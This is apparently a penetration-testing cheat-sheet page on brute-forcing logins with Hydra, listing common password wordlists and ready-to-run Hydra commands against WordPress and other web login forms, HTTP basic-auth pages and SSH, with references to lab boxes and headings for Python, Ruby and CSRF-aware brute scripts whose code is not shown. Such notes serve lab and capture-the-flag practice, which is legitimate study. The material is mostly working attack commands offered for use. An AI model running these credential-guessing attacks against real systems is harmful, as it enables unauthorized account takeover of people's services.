Hydra Brutes
Hydra Brute Force
If login attempts give an "Invalid Username"
We can Brute-Force based on this error
You could use Burp for the keywords first (if you need it)
Wordlist (common passwords)
/usr/share/dirb/wordlists/common.txt
10k_most_common.txt ..faster than rockyou, but decent!
.. SecLists/Passwords/Leaked-Databases/rockyou.txt
.. SecLists/Passwords/twitter-banned.txt ..small list of good pws
---------------------------
wordpress/blog
> hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:=Invalid username"
> hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
> hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"
---------------------------
web-form-login
> hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
> hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php
---------------------------
ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x
-t 64 ..if you want to speed up threads !!!!Trim your wordlist
REF: DictsListsMangling
Example: Pull everything with 'nibble' in the word and.. try ONLY these
Patator
Also: SSHBrutePatator
Python Brute Force Starter Script:
Python Brute Loop:
REF: PythonBase64Loop
Ruby Brute Loop
Ruby Script for passwords on MongoDBInjection
Test every letter to see if it matches the 'first' letter/set
Brute CSRF Python
Scrape the page and get the csrf token
REF: SenseHTB ippsec, pfsense
Last updated
Was this helpful?